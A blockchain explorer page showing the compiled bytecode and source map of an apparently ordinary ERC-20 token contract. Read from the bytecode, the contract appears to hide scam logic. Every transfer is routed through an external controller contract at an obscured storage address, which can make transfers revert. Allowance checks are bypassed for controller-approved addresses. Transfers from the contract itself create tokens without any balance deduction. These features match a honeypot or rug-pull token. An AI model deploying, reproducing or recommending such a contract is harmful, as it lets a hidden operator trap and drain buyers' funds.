ffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f33905090565b61042c83838360016106a8565b505050565b5f61043c8484610396565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114158015610474575061047283610877565b155b156104d157818110156104c2578281836040517ffb8f41b20000000000000000000000000000000000000000000000000000000081526004016104b993929190611112565b60405180910390fd5b6104d084848484035f6106a8565b5b50505050565b5f6104e0610418565b90505f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610552575f6040517f96c6fd1e00000000000000000000000000000000000000000000000000000000815260040161054991906110bb565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036105c2575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016105b991906110bb565b60405180910390fd5b6105cd8484846109d4565b5f6105d6610d28565b73ffffffffffffffffffffffffffffffffffffffff1663dd2d8bd6838787876040516024016106089493929190611147565b6040516020818303038152906040529060e01b6020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff838183161783525050505060405161065691906111ce565b5f604051808303815f865af19150503d805f811461068f576040519150601f19603f3d011682016040523d82523d5f602084013e610694565b606091505b50509050806106a1575f80fd5b5050505050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610718575f6040517fe602df0500000000000000000000000000000000000000000000000000000000815260040161070f91906110bb565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610788575f6040517f94280d6200000000000000000000000000000000000000000000000000000000815260040161077f91906110bb565b60405180910390fd5b8160015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508015610871578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516108689190610fe4565b60405180910390a35b50505050565b5f8073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036108e8575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016108df91906110bb565b60405180910390fd5b5f806108f2610d28565b73ffffffffffffffffffffffffffffffffffffffff1663ce56c4228560405160240161091e91906110bb565b6040516020818303038152906040529060e01b6020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff838183161783525050505060405161096c91906111ce565b5f60405180830381855afa9150503d805f81146109a4576040519150601f19603f3d011682016040523d82523d5f602084013e6109a9565b606091505b50915091508180156109cb5750808060200190518101906109ca919061120e565b5b92505050919050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a5357826adf56b9541c229fce000000826040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610a4a93929190611112565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ad257826adf56b9541c229fce000000826040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610ac993929190611112565b60405180910390fd5b3073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614610bd3575f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610b8e578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610b8593929190611112565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b3073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614610c5057805f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b3073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015610cb857503073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b15610d23578173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610d1a9190610fe4565b60405180910390a35b505050565b5f805f60037f385bc4d6390990be561c3c83c069c506b53f29bfb0f09dbd3206ff15a96701b85f1b901c5f1c73ffffffffffffffffffffffffffffffffffffffff1663782d557d6040516024016040516020818303038152906040529060e01b6020820180517bffffffffffffffffffffffffffffffffffffffffffffffffffffffff8381831617835250505050604051610dc391906111ce565b5f60405180830381855afa9150503d805f8114610dfb576040519150601f19603f3d011682016040523d82523d5f602084013e610e00565b606091505b509150915081610e0e575f80fd5b80806020019051810190610e229190611274565b9250505090565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610e60578082015181840152602081019050610e45565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610e8582610e29565b610e8f8185610e33565b9350610e9f818560208601610e43565b610ea881610e6b565b840191505092915050565b5f6020820190508181035f830152610ecb8184610e7b565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610f0082610ed7565b9050919050565b610f1081610ef6565b8114610f1a575f80fd5b50565b5f81359050610f2b81610f07565b92915050565b5f819050919050565b610f4381610f31565b8114610f4d575f80fd5b50565b5f81359050610f5e81610f3a565b92915050565b5f8060408385031215610f7a57610f79610ed3565b5b5f610f8785828601610f1d565b9250506020610f9885828601610f50565b9150509250929050565b5f8115159050919050565b610fb681610fa2565b82525050565b5f602082019050610fcf5f830184610fad565b92915050565b610fde81610f31565b82525050565b5f602082019050610ff75f830184610fd5565b92915050565b5f805f6060848603121561101457611013610ed3565b5b5f61102186828701610f1d565b935050602061103286828701610f1d565b925050604061104386828701610f50565b9150509250925092565b5f60ff82169050919050565b6110628161104d565b82525050565b5f60208201905061107b5f830184611059565b92915050565b5f6020828403121561109657611095610ed3565b5b5f6110a384828501610f1d565b91505092915050565b6110b581610ef6565b82525050565b5f6020820190506110ce5f8301846110ac565b92915050565b5f80604083850312156110ea576110e9610ed3565b5b5f6110f785828601610f1d565b925050602061110885828601610f1d565b9150509250929050565b5f6060820190506111255f8301866110ac565b6111326020830185610fd5565b61113f6040830184610fd5565b949350505050565b5f60808201905061115a5f8301876110ac565b61116760208301866110ac565b61117460408301856110ac565b6111816060830184610fd5565b95945050505050565b5f81519050919050565b5f81905092915050565b5f6111a88261118a565b6111b28185611194565b93506111c2818560208601610e43565b80840191505092915050565b5f6111d9828461119e565b915081905092915050565b6111ed81610fa2565b81146111f7575f80fd5b50565b5f81519050611208816111e4565b92915050565b5f6020828403121561122357611222610ed3565b5b5f611230848285016111fa565b91505092915050565b5f61124382610ed7565b9050919050565b61125381611239565b811461125d575f80fd5b50565b5f8151905061126e8161124a565b92915050565b5f6020828403121561128957611288610ed3565b5b5f61129684828501611260565b9150509291505056fea26469706673582212208f46e9e5a82265622a6814a990b5ecaa351f203373e0815590c0346508e155e964736f6c63430008180033

Deployed Bytecode Sourcemap

11363:10451:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;12249:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14550:190;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13351:99;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15350:249;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13202:84;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13513:118;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12459:95;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13836:189;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11872:20;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14089:142;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12249:91;12294:13;12327:5;;;;;;;;;;;;;;;;;12320:12;;12249:91;:::o;14550:190::-;14623:4;14640:13;14656:12;:10;:12::i;:::-;14640:28;;14679:31;14688:5;14695:7;14704:5;14679:8;:31::i;:::-;14728:4;14721:11;;;14550:190;;;;:::o;13351:99::-;13403:7;11628:16;13423:19;;13351:99;:::o;15350:249::-;15437:4;15454:15;15472:12;:10;:12::i;:::-;15454:30;;15495:37;15511:4;15517:7;15526:5;15495:15;:37::i;:::-;15543:26;15553:4;15559:2;15563:5;15543:9;:26::i;:::-;15587:4;15580:11;;;15350:249;;;;;:::o;13202:84::-;13251:5;13276:2;13269:9;;13202:84;:::o;13513:118::-;13578:7;13605:9;:18;13615:7;13605:18;;;;;;;;;;;;;;;;13598:25;;13513:118;;;:::o;12459:95::-;12506:13;12539:7;;;;;;;;;;;;;;;;;12532:14;;12459:95;:::o;13836:189::-;13905:4;13922:13;13938:12;:10;:12::i;:::-;13922:28;;13961:27;13971:5;13978:2;13982:5;13961:9;:27::i;:::-;14013:4;14006:11;;;13836:189;;;;:::o;11872:20::-;;;;;;;;;;;;;:::o;14089:142::-;14169:7;14196:11;:18;14208:5;14196:18;;;;;;;;;;;;;;;:27;14215:7;14196:27;;;;;;;;;;;;;;;;14189:34;;14089:142;;;;:::o;3826:98::-;3879:7;3906:10;3899:17;;3826:98;:::o;19457:130::-;19542:37;19551:5;19558:7;19567:5;19574:4;19542:8;:37::i;:::-;19457:130;;;:::o;21294:517::-;21394:24;21421:25;21431:5;21438:7;21421:9;:25::i;:::-;21394:52;;21481:17;21461:16;:37;;:66;;;;;21503:24;21519:7;21503:15;:24::i;:::-;21502:25;21461:66;21457:347;;;21568:5;21549:16;:24;21545:132;;;21628:7;21637:16;21655:5;21601:60;;;;;;;;;;;;;:::i;:::-;;;;;;;;21545:132;21720:57;21729:5;21736:7;21764:5;21745:16;:24;21771:5;21720:8;:57::i;:::-;21457:347;21383:428;21294:517;;;:::o;16566:495::-;16646:15;16664:12;:10;:12::i;:::-;16646:30;;16707:1;16691:18;;:4;:18;;;16687:88;;16760:1;16733:30;;;;;;;;;;;:::i;:::-;;;;;;;;16687:88;16803:1;16789:16;;:2;:16;;;16785:88;;16858:1;16829:32;;;;;;;;;;;:::i;:::-;;;;;;;;16785:88;16883:24;16891:4;16897:2;16901:5;16883:7;:24::i;:::-;16919:13;16940:10;:8;:10::i;:::-;:15;;16979:10;16991:7;17000:4;17006:2;17010:5;16956:60;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16940:77;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16918:99;;;17036:8;17028:17;;;;;;16635:426;;16566:495;;;:::o;20454:443::-;20584:1;20567:19;;:5;:19;;;20563:91;;20639:1;20610:32;;;;;;;;;;;:::i;:::-;;;;;;;;20563:91;20687:1;20668:21;;:7;:21;;;20664:92;;20741:1;20713:31;;;;;;;;;;;:::i;:::-;;;;;;;;20664:92;20796:5;20766:11;:18;20778:5;20766:18;;;;;;;;;;;;;;;:27;20785:7;20766:27;;;;;;;;;;;;;;;:35;;;;20816:9;20812:78;;;20863:7;20847:31;;20856:5;20847:31;;;20872:5;20847:31;;;;;;:::i;:::-;;;;;;;;20812:78;20454:443;;;;:::o;17124:361::-;17189:4;17228:1;17209:21;;:7;:21;;;17205:93;;17283:1;17254:32;;;;;;;;;;;:::i;:::-;;;;;;;;17205:93;17317:13;17332:18;17356:10;:8;:10::i;:::-;:21;;17401:10;17413:7;17378:43;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17356:66;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17316:106;;;;17440:8;:37;;;;;17463:5;17452:25;;;;;;;;;;;;:::i;:::-;17440:37;17433:44;;;;17124:361;;;:::o;17817:1087::-;17922:1;17906:18;;:4;:18;;;17903:107;;17972:4;11628:16;17992:5;17947:51;;;;;;;;;;;;;:::i;:::-;;;;;;;;17903:107;18037:1;18023:16;;:2;:16;;;18020:105;;18087:4;11628:16;18107:5;18062:51;;;;;;;;;;;;;:::i;:::-;;;;;;;;18020:105;18156:4;18140:21;;:4;:21;;;18137:396;;18177:19;18199:9;:15;18209:4;18199:15;;;;;;;;;;;;;;;;18177:37;;18247:5;18233:11;:19;18229:117;;;18305:4;18311:11;18324:5;18280:50;;;;;;;;;;;;;:::i;:::-;;;;;;;;18229:117;18501:5;18487:11;:19;18469:9;:15;18479:4;18469:15;;;;;;;;;;;;;;;:37;;;;18162:371;18137:396;18562:4;18548:19;;:2;:19;;;18545:235;;18748:5;18731:9;:13;18741:2;18731:13;;;;;;;;;;;;;;;;:22;;;;;;;;;;;18545:235;18811:4;18795:21;;:4;:21;;;;:44;;;;;18834:4;18820:19;;:2;:19;;;;18795:44;18792:105;;;18875:2;18860:25;;18869:4;18860:25;;;18879:5;18860:25;;;;;;:::i;:::-;;;;;;;;18792:105;17817:1087;;;:::o;15891:282::-;15934:7;15954:13;15969:18;16031:1;11797:66;16017:10;;:15;;16009:24;;15993:53;;16070:10;16047:34;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;15993:89;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;15953:129;;;;16101:8;16093:17;;;;;;16144:5;16133:28;;;;;;;;;;;;:::i;:::-;16125:36;;;;15891:282;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:619::-;3875:6;3883;3891;3940:2;3928:9;3919:7;3915:23;3911:32;3908:119;;;3946:79;;:::i;:::-;3908:119;4066:1;4091:53;4136:7;4127:6;4116:9;4112:22;4091:53;:::i;:::-;4081:63;;4037:117;4193:2;4219:53;4264:7;4255:6;4244:9;4240:22;4219:53;:::i;:::-;4209:63;;4164:118;4321:2;4347:53;4392:7;4383:6;4372:9;4368:22;4347:53;:::i;:::-;4337:63;;4292:118;3798:619;;;;;:::o;4423:86::-;4458:7;4498:4;4491:5;4487:16;4476:27;;4423:86;;;:::o;4515:112::-;4598:22;4614:5;4598:22;:::i;:::-;4593:3;4586:35;4515:112;;:::o;4633:214::-;4722:4;4760:2;4749:9;4745:18;4737:26;;4773:67;4837:1;4826:9;4822:17;4813:6;4773:67;:::i;:::-;4633:214;;;;:::o;4853:329::-;4912:6;4961:2;4949:9;4940:7;4936:23;4932:32;4929:119;;;4967:79;;:::i;:::-;4929:119;5087:1;5112:53;5157:7;5148:6;5137:9;5133:22;5112:53;:::i;:::-;5102:63;;5058:117;4853:329;;;;:::o;5188:118::-;5275:24;5293:5;5275:24;:::i;:::-;5270:3;5263:37;5188:118;;:::o;5312:222::-;5405:4;5443:2;5432:9;5428:18;5420:26;;5456:71;5524:1;5513:9;5509:17;5500:6;5456:71;:::i;:::-;5312:222;;;;:::o;5540:474::-;5608:6;5616;5665:2;5653:9;5644:7;5640:23;5636:32;5633:119;;;5671:79;;:::i;:::-;5633:119;5791:1;5816:53;5861:7;5852:6;5841:9;5837:22;5816:53;:::i;:::-;5806:63;;5762:117;5918:2;5944:53;5989:7;5980:6;5969:9;5965:22;5944:53;:::i;:::-;5934:63;;5889:118;5540:474;;;;;:::o;6020:442::-;6169:4;6207:2;6196:9;6192:18;6184:26;;6220:71;6288:1;6277:9;6273:17;6264:6;6220:71;:::i;:::-;6301:72;6369:2;6358:9;6354:18;6345:6;6301:72;:::i;:::-;6383;6451:2;6440:9;6436:18;6427:6;6383:72;:::i;:::-;6020:442;;;;;;:::o;6468:553::-;6645:4;6683:3;6672:9;6668:19;6660:27;;6697:71;6765:1;6754:9;6750:17;6741:6;6697:71;:::i;:::-;6778:72;6846:2;6835:9;6831:18;6822:6;6778:72;:::i;:::-;6860;6928:2;6917:9;6913:18;6904:6;6860:72;:::i;:::-;6942;7010:2;6999:9;6995:18;6986:6;6942:72;:::i;:::-;6468:553;;;;;;;:::o;7027:98::-;7078:6;7112:5;7106:12;7096:22;;7027:98;;;:::o;7131:147::-;7232:11;7269:3;7254:18;;7131:147;;;;:::o;7284:386::-;7388:3;7416:38;7448:5;7416:38;:::i;:::-;7470:88;7551:6;7546:3;7470:88;:::i;:::-;7463:95;;7567:65;7625:6;7620:3;7613:4;7606:5;7602:16;7567:65;:::i;:::-;7657:6;7652:3;7648:16;7641:23;;7392:278;7284:386;;;;:::o;7676:271::-;7806:3;7828:93;7917:3;7908:6;7828:93;:::i;:::-;7821:100;;7938:3;7931:10;;7676:271;;;;:::o;7953:116::-;8023:21;8038:5;8023:21;:::i;:::-;8016:5;8013:32;8003:60;;8059:1;8056;8049:12;8003:60;7953:116;:::o;8075:137::-;8129:5;8160:6;8154:13;8145:22;;8176:30;8200:5;8176:30;:::i;:::-;8075:137;;;;:::o;8218:345::-;8285:6;8334:2;8322:9;8313:7;8309:23;8305:32;8302:119;;;8340:79;;:::i;:::-;8302:119;8460:1;8485:61;8538:7;8529:6;8518:9;8514:22;8485:61;:::i;:::-;8475:71;;8431:125;8218:345;;;;:::o;8569:104::-;8614:7;8643:24;8661:5;8643:24;:::i;:::-;8632:35;;8569:104;;;:::o;8679:138::-;8760:32;8786:5;8760:32;:::i;:::-;8753:5;8750:43;8740:71;;8807:1;8804;8797:12;8740:71;8679:138;:::o;8823:159::-;8888:5;8919:6;8913:13;8904:22;;8935:41;8970:5;8935:41;:::i;:::-;8823:159;;;;:::o;8988:367::-;9066:6;9115:2;9103:9;9094:7;9090:23;9086:32;9083:119;;;9121:79;;:::i;:::-;9083:119;9241:1;9266:72;9330:7;9321:6;9310:9;9306:22;9266:72;:::i;:::-;9256:82;;9212:136;8988:367;;;;:::o

Swarm Source

ipfs://8f46e9e5a82265622a6814a990b5ecaa351f203373e0815590c0346508e155e9
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.